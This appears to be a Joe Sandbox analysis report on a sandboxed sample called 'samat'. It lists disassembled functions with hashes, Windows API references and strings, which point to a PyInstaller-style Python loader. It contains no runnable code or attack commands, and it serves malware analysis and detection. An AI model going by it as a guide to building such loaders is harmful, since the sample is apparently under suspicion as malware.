Memory Dump Source

Source File: 00000007.00000002.4592535190.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true

Associated: 00000007.00000002.4592472245.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592605136.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592668306.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592668306.00007FF7E1302000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592786986.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff7e12c0000_samat.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dc981bf603441a130e1c6ba5e96f77be0c3c60e19ec03e3d560a09712d731568
Instruction ID: 360d3821036e32fcf20ddb7d016d2337665c633b0e9b9e0dfe93695e9ef38a94
Opcode Fuzzy Hash: dc981bf603441a130e1c6ba5e96f77be0c3c60e19ec03e3d560a09712d731568
Instruction Fuzzy Hash: C851B137B1865182E7249F29C841338B7A9EB44B58FA44132CE4C17BA4DBBAE843D752

Function 00007FF7E12D1740 Relevance: .1, Instructions: 145COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.4592535190.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true

Associated: 00000007.00000002.4592472245.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592605136.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592668306.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592668306.00007FF7E1302000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592786986.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff7e12c0000_samat.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3943df286285c50b07f09d339b53caaa0afa34ddfac4fad96d8a3f7ffd6ad23b
Instruction ID: 3a262b99af3cd408d06bd2ffa6a21fa97daa19eb2209e7918ab56d516b4d1957
Opcode Fuzzy Hash: 3943df286285c50b07f09d339b53caaa0afa34ddfac4fad96d8a3f7ffd6ad23b
Instruction Fuzzy Hash: 3F51D637B1865185F7289B29C84233CB7A5EB44B58FA54132CE4C47BA4CF7AE843D751

Function 00007FF7E12D1F60 Relevance: .1, Instructions: 145COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.4592535190.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true

Associated: 00000007.00000002.4592472245.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592605136.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592668306.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592668306.00007FF7E1302000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592786986.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff7e12c0000_samat.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e734bc54909bdf7d9c6fd1772be64da5dc64d4f5bf3044a39ac3ba7850561882
Instruction ID: 82b4757ef512869acece60c3ee6d357ebf5ba46c947ab5f6660c69f83cb5150f
Opcode Fuzzy Hash: e734bc54909bdf7d9c6fd1772be64da5dc64d4f5bf3044a39ac3ba7850561882
Instruction Fuzzy Hash: 3C51F437B1865186E7249B29C84133CB3A9EB58F58FA54032CE4C077A5CFBAE843D751

Function 00007FF7E12D5D30 Relevance: .1, Instructions: 138COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.4592535190.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true

Associated: 00000007.00000002.4592472245.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592605136.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592668306.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592668306.00007FF7E1302000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592786986.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff7e12c0000_samat.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dde3b7cfbcf26fc8d7513faefc9a59c4b8821272907dfbb35b6db6355186da00
Instruction ID: 31aa9cc145ebeb33aa58ece1b15f521f75a4e9bf817f47f729039cf7dd3c1697
Opcode Fuzzy Hash: dde3b7cfbcf26fc8d7513faefc9a59c4b8821272907dfbb35b6db6355186da00
Instruction Fuzzy Hash: 2641E8E3A0974A04EB99A9388C0577496A89F127A0DD852B6CDAD573C3CCFD6547C132

Function 00007FF7E12D9EA0 Relevance: .1, Instructions: 126COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.4592535190.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true

Associated: 00000007.00000002.4592472245.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592605136.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592668306.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592668306.00007FF7E1302000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592786986.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff7e12c0000_samat.jbxd

Similarity

API ID: ErrorFreeHeapLast
String ID:
API String ID: 485612231-0
Opcode ID: 1c7003d4bfacf113f63307708dabd17e5ede6cda44dccf6aa27d02a6b9ea0481
Instruction ID: 6cfab316b1c35e622b34f53ca06304b1d700eeedaf38a7d46d691c629d7e82ee
Opcode Fuzzy Hash: 1c7003d4bfacf113f63307708dabd17e5ede6cda44dccf6aa27d02a6b9ea0481
Instruction Fuzzy Hash: 04410523714A5582EF04DF2ADE15669B3A5BB48FD0B899037EE0DA7B54DE7CC0428301

Function 00007FF7E12D80E4 Relevance: .1, Instructions: 98COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.4592535190.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true

Associated: 00000007.00000002.4592472245.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592605136.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592668306.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592668306.00007FF7E1302000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592786986.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff7e12c0000_samat.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 12404f4f4f1323fea4d4e583727f71dd7b5a0d93f2e51056eadc76cf5c92dd81
Instruction ID: 9b923509a452506fa1e046e330c882dd066f811edeefc7dc84ed88e2bc966b00
Opcode Fuzzy Hash: 12404f4f4f1323fea4d4e583727f71dd7b5a0d93f2e51056eadc76cf5c92dd81
Instruction Fuzzy Hash: 8231E732B08B4241E764AF25AC4233DA6D8ABC4BD0F54423AEA8D57BD5DF7CD0028715

Function 00007FF7E12E9570 Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.4592535190.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true

Associated: 00000007.00000002.4592472245.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592605136.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592668306.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592668306.00007FF7E1302000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592786986.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff7e12c0000_samat.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5d3ac10822f6242d2b374fc0e1218152d8e80c351f0dfcd4fab21387456caa74
Instruction ID: 980b8ad0acaaae6f3e87279186055c087afc8bd36a533f8671e79a36965bf3f6
Opcode Fuzzy Hash: 5d3ac10822f6242d2b374fc0e1218152d8e80c351f0dfcd4fab21387456caa74
Instruction Fuzzy Hash: 48F044717282958ADB989F69A843629B7D0F718384F80907ED58D83B04DA7C90518F15

Function 00007FF7E12CD30C Relevance: .0, Instructions: 2COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.4592535190.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true

Associated: 00000007.00000002.4592472245.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592605136.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592668306.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592668306.00007FF7E1302000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592786986.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff7e12c0000_samat.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3c3909751b2697c6481bc0460501d6177e5cf72f77169ad8285d6e0cd944102a
Instruction ID: 1998452e97deb3305fc46a9cd50b2e685f72c6776930c66a0a473c380ecb34f9
Opcode Fuzzy Hash: 3c3909751b2697c6481bc0460501d6177e5cf72f77169ad8285d6e0cd944102a
Instruction Fuzzy Hash: EAA00121A0C84AD1E745AB10AC92225A228BB54300BC04033E10DA60A59EBDA804D662

Function 00007FF7E12C5830 Relevance: 229.6, APIs: 86, Strings: 45, Instructions: 400libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(?,00007FF7E12C64CF,?,00007FF7E12C336E), ref: 00007FF7E12C5840
GetLastError.KERNEL32(?,00007FF7E12C64CF,?,00007FF7E12C336E), ref: 00007FF7E12C5852
GetProcAddress.KERNEL32(?,00007FF7E12C64CF,?,00007FF7E12C336E), ref: 00007FF7E12C5889
GetLastError.KERNEL32(?,00007FF7E12C64CF,?,00007FF7E12C336E), ref: 00007FF7E12C589B
GetProcAddress.KERNEL32(?,00007FF7E12C64CF,?,00007FF7E12C336E), ref: 00007FF7E12C58B4
GetLastError.KERNEL32(?,00007FF7E12C64CF,?,00007FF7E12C336E), ref: 00007FF7E12C58C6
GetProcAddress.KERNEL32(?,00007FF7E12C64CF,?,00007FF7E12C336E), ref: 00007FF7E12C58DF
GetLastError.KERNEL32(?,00007FF7E12C64CF,?,00007FF7E12C336E), ref: 00007FF7E12C58F1
GetProcAddress.KERNEL32(?,00007FF7E12C64CF,?,00007FF7E12C336E), ref: 00007FF7E12C590D
GetLastError.KERNEL32(?,00007FF7E12C64CF,?,00007FF7E12C336E), ref: 00007FF7E12C591F
GetProcAddress.KERNEL32(?,00007FF7E12C64CF,?,00007FF7E12C336E), ref: 00007FF7E12C593B
GetLastError.KERNEL32(?,00007FF7E12C64CF,?,00007FF7E12C336E), ref: 00007FF7E12C594D
GetProcAddress.KERNEL32(?,00007FF7E12C64CF,?,00007FF7E12C336E), ref: 00007FF7E12C5969
GetLastError.KERNEL32(?,00007FF7E12C64CF,?,00007FF7E12C336E), ref: 00007FF7E12C597B
GetProcAddress.KERNEL32(?,00007FF7E12C64CF,?,00007FF7E12C336E), ref: 00007FF7E12C5997
GetLastError.KERNEL32(?,00007FF7E12C64CF,?,00007FF7E12C336E), ref: 00007FF7E12C59A9
GetProcAddress.KERNEL32(?,00007FF7E12C64CF,?,00007FF7E12C336E), ref: 00007FF7E12C59C5
GetLastError.KERNEL32(?,00007FF7E12C64CF,?,00007FF7E12C336E), ref: 00007FF7E12C59D7

Strings

PyPreConfig_InitIsolatedConfig, xrefs: 00007FF7E12C5DDD, 00007FF7E12C5DFF
Py_InitializeFromConfig, xrefs: 00007FF7E12C5903, 00007FF7E12C5925
PyMem_RawFree, xrefs: 00007FF7E12C5C9B, 00007FF7E12C5CBD
PyErr_Clear, xrefs: 00007FF7E12C5AA1, 00007FF7E12C5AC3
PyObject_Str, xrefs: 00007FF7E12C5DAF, 00007FF7E12C5DD1
PyErr_Restore, xrefs: 00007FF7E12C5B87, 00007FF7E12C5BA9
Py_PreInitialize, xrefs: 00007FF7E12C595F, 00007FF7E12C5981
PySys_GetObject, xrefs: 00007FF7E12C5E67, 00007FF7E12C5E89
PyObject_GetAttrString, xrefs: 00007FF7E12C5D53, 00007FF7E12C5D75
Failed to get address for %hs, xrefs: 00007FF7E12C5861
PyMarshal_ReadObjectFromString, xrefs: 00007FF7E12C5C6D, 00007FF7E12C5C8F
PyErr_NormalizeException, xrefs: 00007FF7E12C5AFD, 00007FF7E12C5B1F
PyConfig_SetWideStringList, xrefs: 00007FF7E12C5A73, 00007FF7E12C5A95
Py_DecodeLocale, xrefs: 00007FF7E12C587F, 00007FF7E12C58A1
PyUnicode_FromString, xrefs: 00007FF7E12C5F7B, 00007FF7E12C5F9D
PyConfig_Clear, xrefs: 00007FF7E12C598D, 00007FF7E12C59AF
PyModule_GetDict, xrefs: 00007FF7E12C5CC9, 00007FF7E12C5CEB
PyConfig_SetString, xrefs: 00007FF7E12C5A45, 00007FF7E12C5A67
PyErr_Print, xrefs: 00007FF7E12C5B59, 00007FF7E12C5B7B
PyEval_EvalCode, xrefs: 00007FF7E12C5BB5, 00007FF7E12C5BD7
PyUnicode_FromFormat, xrefs: 00007FF7E12C5F4D, 00007FF7E12C5F6F
PyUnicode_Replace, xrefs: 00007FF7E12C5FD7, 00007FF7E12C5FF9
Py_Finalize, xrefs: 00007FF7E12C58D5, 00007FF7E12C58F7
Py_ExitStatusException, xrefs: 00007FF7E12C58AA, 00007FF7E12C58CC
PyConfig_SetBytesString, xrefs: 00007FF7E12C5A17, 00007FF7E12C5A39
PyImport_AddModule, xrefs: 00007FF7E12C5BE3, 00007FF7E12C5C05
Py_IsInitialized, xrefs: 00007FF7E12C5931, 00007FF7E12C5953
PyStatus_Exception, xrefs: 00007FF7E12C5E39, 00007FF7E12C5E5B
PyObject_SetAttrString, xrefs: 00007FF7E12C5D81, 00007FF7E12C5DA3
PyRun_SimpleStringFlags, xrefs: 00007FF7E12C5E0B, 00007FF7E12C5E2D
PyConfig_InitIsolatedConfig, xrefs: 00007FF7E12C59BB, 00007FF7E12C59DD
PyImport_ImportModule, xrefs: 00007FF7E12C5C3F, 00007FF7E12C5C61
PyObject_CallFunction, xrefs: 00007FF7E12C5CF7, 00007FF7E12C5D19
PyUnicode_AsUTF8, xrefs: 00007FF7E12C5EC3, 00007FF7E12C5EE5
PyImport_ExecCodeModule, xrefs: 00007FF7E12C5C11, 00007FF7E12C5C33
PyErr_Occurred, xrefs: 00007FF7E12C5B2B, 00007FF7E12C5B4D
PyUnicode_Decode, xrefs: 00007FF7E12C5EF1, 00007FF7E12C5F13
PySys_SetObject, xrefs: 00007FF7E12C5E95, 00007FF7E12C5EB7
PyUnicode_DecodeFSDefault, xrefs: 00007FF7E12C5F1F, 00007FF7E12C5F41
PyConfig_Read, xrefs: 00007FF7E12C59E9, 00007FF7E12C5A0B
GetProcAddress, xrefs: 00007FF7E12C5868
PyUnicode_Join, xrefs: 00007FF7E12C5FA9, 00007FF7E12C5FCB
PyObject_CallFunctionObjArgs, xrefs: 00007FF7E12C5D25, 00007FF7E12C5D47
Py_DecRef, xrefs: 00007FF7E12C5836, 00007FF7E12C5858
PyErr_Fetch, xrefs: 00007FF7E12C5ACF, 00007FF7E12C5AF1

Memory Dump Source

Source File: 00000007.00000002.4592535190.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true

Associated: 00000007.00000002.4592472245.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592605136.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592668306.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592668306.00007FF7E1302000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592786986.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff7e12c0000_samat.jbxd

Similarity

API ID: AddressErrorLastProc
String ID: Failed to get address for %hs$GetProcAddress$PyConfig_Clear$PyConfig_InitIsolatedConfig$PyConfig_Read$PyConfig_SetBytesString$PyConfig_SetString$PyConfig_SetWideStringList$PyErr_Clear$PyErr_Fetch$PyErr_NormalizeException$PyErr_Occurred$PyErr_Print$PyErr_Restore$PyEval_EvalCode$PyImport_AddModule$PyImport_ExecCodeModule$PyImport_ImportModule$PyMarshal_ReadObjectFromString$PyMem_RawFree$PyModule_GetDict$PyObject_CallFunction$PyObject_CallFunctionObjArgs$PyObject_GetAttrString$PyObject_SetAttrString$PyObject_Str$PyPreConfig_InitIsolatedConfig$PyRun_SimpleStringFlags$PyStatus_Exception$PySys_GetObject$PySys_SetObject$PyUnicode_AsUTF8$PyUnicode_Decode$PyUnicode_DecodeFSDefault$PyUnicode_FromFormat$PyUnicode_FromString$PyUnicode_Join$PyUnicode_Replace$Py_DecRef$Py_DecodeLocale$Py_ExitStatusException$Py_Finalize$Py_InitializeFromConfig$Py_IsInitialized$Py_PreInitialize
API String ID: 199729137-653951865
Opcode ID: a72b1b0889ffc37889110ad0e4f068dcb4eb8b0bbe2e77bf2d8672c26fae6e03
Instruction ID: 984ed8757276d6120e08ce48f0a8d5039e414908a698defd7d51a856468169ef
Opcode Fuzzy Hash: a72b1b0889ffc37889110ad0e4f068dcb4eb8b0bbe2e77bf2d8672c26fae6e03
Instruction Fuzzy Hash: D522B560B09B0781FB06FB65AC167B5A3A9BF15754FC49437C42E82260EFFDB558C222

Function 00007FF7E12C81D0 Relevance: 24.6, APIs: 6, Strings: 8, Instructions: 117COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7E12C9390: MultiByteToWideChar.KERNEL32(?,?,?,00007FF7E12C45F4,00000000,00007FF7E12C1985), ref: 00007FF7E12C93C9

ExpandEnvironmentStringsW.KERNEL32(?,00007FF7E12C86B7,?,?,00000000,00007FF7E12C3CBB), ref: 00007FF7E12C822C

Part of subcall function 00007FF7E12C2810: MessageBoxW.USER32 ref: 00007FF7E12C28EA

Strings

CreateDirectory, xrefs: 00007FF7E12C837C
LOADER: runtime-tmpdir points to non-existent drive %ls (type: %d)!, xrefs: 00007FF7E12C829D
LOADER: failed to expand environment variables in the runtime-tmpdir., xrefs: 00007FF7E12C8240
%.*s, xrefs: 00007FF7E12C830C
LOADER: failed to create runtime-tmpdir path %ls!, xrefs: 00007FF7E12C8373
\, xrefs: 00007FF7E12C8261
LOADER: failed to obtain the absolute path of the runtime-tmpdir., xrefs: 00007FF7E12C82D9
LOADER: failed to convert runtime-tmpdir to a wide string., xrefs: 00007FF7E12C8203

Memory Dump Source

Source File: 00000007.00000002.4592535190.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true

Associated: 00000007.00000002.4592472245.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592605136.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592668306.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592668306.00007FF7E1302000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592786986.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff7e12c0000_samat.jbxd

Similarity

API ID: ByteCharEnvironmentExpandMessageMultiStringsWide
String ID: %.*s$CreateDirectory$LOADER: failed to convert runtime-tmpdir to a wide string.$LOADER: failed to create runtime-tmpdir path %ls!$LOADER: failed to expand environment variables in the runtime-tmpdir.$LOADER: failed to obtain the absolute path of the runtime-tmpdir.$LOADER: runtime-tmpdir points to non-existent drive %ls (type: %d)!$\
API String ID: 1662231829-930877121
Opcode ID: 9187bed43bf71c5340eadf58a1920dd2feb36a2730cc38c17813087cef3183ed
Instruction ID: 2cc97a808fae56afa4ee59e3e19a0f94149b729cb8c39f9f790c874412a0d512
Opcode Fuzzy Hash: 9187bed43bf71c5340eadf58a1920dd2feb36a2730cc38c17813087cef3183ed
Instruction Fuzzy Hash: 9C51A311B1868281FB51BB20EC573BAE259AF94780FC59433DB0E836D5EEBCE544C362

Function 00007FF7E12C2180 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 120COMMON

Download Yara Rule

APIs

GetDC.USER32 ref: 00007FF7E12C21AB
SelectObject.GDI32 ref: 00007FF7E12C21F2
DrawTextW.USER32 ref: 00007FF7E12C2215
SelectObject.GDI32 ref: 00007FF7E12C222B
ReleaseDC.USER32 ref: 00007FF7E12C223B
MoveWindow.USER32 ref: 00007FF7E12C228B
MoveWindow.USER32 ref: 00007FF7E12C22CB
MoveWindow.USER32 ref: 00007FF7E12C231E
MoveWindow.USER32 ref: 00007FF7E12C2366

Strings

P%, xrefs: 00007FF7E12C21FF

Memory Dump Source

Source File: 00000007.00000002.4592535190.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true

Associated: 00000007.00000002.4592472245.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592605136.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592668306.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592668306.00007FF7E1302000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592786986.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff7e12c0000_samat.jbxd

Similarity

API ID: MoveWindow$ObjectSelect$DrawReleaseText
String ID: P%
API String ID: 2147705588-2959514604
Opcode ID: 044398bc2faddcfc72e28419b1c607044beef288ba0900b5e0371f537bcab75f
Instruction ID: ebf4d3a0c32c6121c8b71d1092ddf96f1ad691fb6c2c108c588ef25df26c52e0
Opcode Fuzzy Hash: 044398bc2faddcfc72e28419b1c607044beef288ba0900b5e0371f537bcab75f
Instruction Fuzzy Hash: AD5107266047A186D7259F26E8182BAF7A1F798B61F004122EBDE83694DF7CD045CB20

Function 00007FF7E12C80C0 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 67COMMON

Download Yara Rule

APIs

GetWindowLongPtrW.USER32 ref: 00007FF7E12C80FF
GetWindowLongPtrW.USER32 ref: 00007FF7E12C817F
ShutdownBlockReasonCreate.USER32 ref: 00007FF7E12C8192
GetLastError.KERNEL32 ref: 00007FF7E12C819C
SetWindowLongPtrW.USER32 ref: 00007FF7E12C81B3

Strings

Needs to remove its temporary files., xrefs: 00007FF7E12C8185

Memory Dump Source

Source File: 00000007.00000002.4592535190.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true

Associated: 00000007.00000002.4592472245.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592605136.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592668306.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592668306.00007FF7E1302000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592786986.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff7e12c0000_samat.jbxd

Similarity

API ID: LongWindow$BlockCreateErrorLastReasonShutdown
String ID: Needs to remove its temporary files.
API String ID: 3975851968-2863640275
Opcode ID: fca9629812ae98fc4dea80e51924cd1fa5b6a95a0379263e815d251d6ca0a567
Instruction ID: b530895f767a068d39fbb523c3f6f018e60985dda97c1510cd40a1c70da1ae6b
Opcode Fuzzy Hash: fca9629812ae98fc4dea80e51924cd1fa5b6a95a0379263e815d251d6ca0a567
Instruction Fuzzy Hash: AE21AD21B0864381E7426B79EC563799294FF85B90F898133DF1D833D4DEBCD5808222

Function 00007FF7E12D6290 Relevance: 14.5, APIs: 3, Strings: 5, Instructions: 494COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF7E12D62D3
_invalid_parameter_noinfo.LIBCMT ref: 00007FF7E12D66C0
_invalid_parameter_noinfo.LIBCMT ref: 00007FF7E12D695C

Strings

p, xrefs: 00007FF7E12D63FD
:, xrefs: 00007FF7E12D648C
p, xrefs: 00007FF7E12D6385
-, xrefs: 00007FF7E12D6369
f, xrefs: 00007FF7E12D63F5

Memory Dump Source

Source File: 00000007.00000002.4592535190.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true

Associated: 00000007.00000002.4592472245.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592605136.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592668306.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592668306.00007FF7E1302000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592786986.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff7e12c0000_samat.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: -$:$f$p$p
API String ID: 3215553584-2013873522
Opcode ID: 75ce3dd5e90789a751ac91fed3db50e3550f512a2f4dec46f6fb30c565ad9a60
Instruction ID: 1a94a1b793212a6b0b17cef60065daf4d81db9c63eb3fba2a5528fff43d401e3
Opcode Fuzzy Hash: 75ce3dd5e90789a751ac91fed3db50e3550f512a2f4dec46f6fb30c565ad9a60
Instruction Fuzzy Hash: 0612C663F0C24386FB64BA14D9163B9F65AFB40750FC44137D6A946AC8DFBCE5848B22

Function 00007FF7E12D0FC8 Relevance: 14.5, APIs: 3, Strings: 5, Instructions: 475COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF7E12D1008
_invalid_parameter_noinfo.LIBCMT ref: 00007FF7E12D13D0
_invalid_parameter_noinfo.LIBCMT ref: 00007FF7E12D166F

Strings

f, xrefs: 00007FF7E12D1255
f, xrefs: 00007FF7E12D110A
f, xrefs: 00007FF7E12D10A0
p, xrefs: 00007FF7E12D1112
p, xrefs: 00007FF7E12D10AD

Memory Dump Source

Source File: 00000007.00000002.4592535190.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true

Associated: 00000007.00000002.4592472245.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592605136.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592668306.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592668306.00007FF7E1302000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592786986.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff7e12c0000_samat.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: f$f$p$p$f
API String ID: 3215553584-1325933183
Opcode ID: efdc55b57c7b5823aa39a5abe82f144bbffe385c3037011f7a836833ec2ff017
Instruction ID: f235075364ba54f1f8c0bf505dd7a2df8deb66df97d2d849682a01aa40e59752
Opcode Fuzzy Hash: efdc55b57c7b5823aa39a5abe82f144bbffe385c3037011f7a836833ec2ff017
Instruction Fuzzy Hash: BC127363F0C18385FB646B14E856779E6A9FB40750FD84033E69A46DC4DFBCE480AB62

Function 00007FF7E12C1050 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 119COMMON

Download Yara Rule

Strings

fread, xrefs: 00007FF7E12C11FD
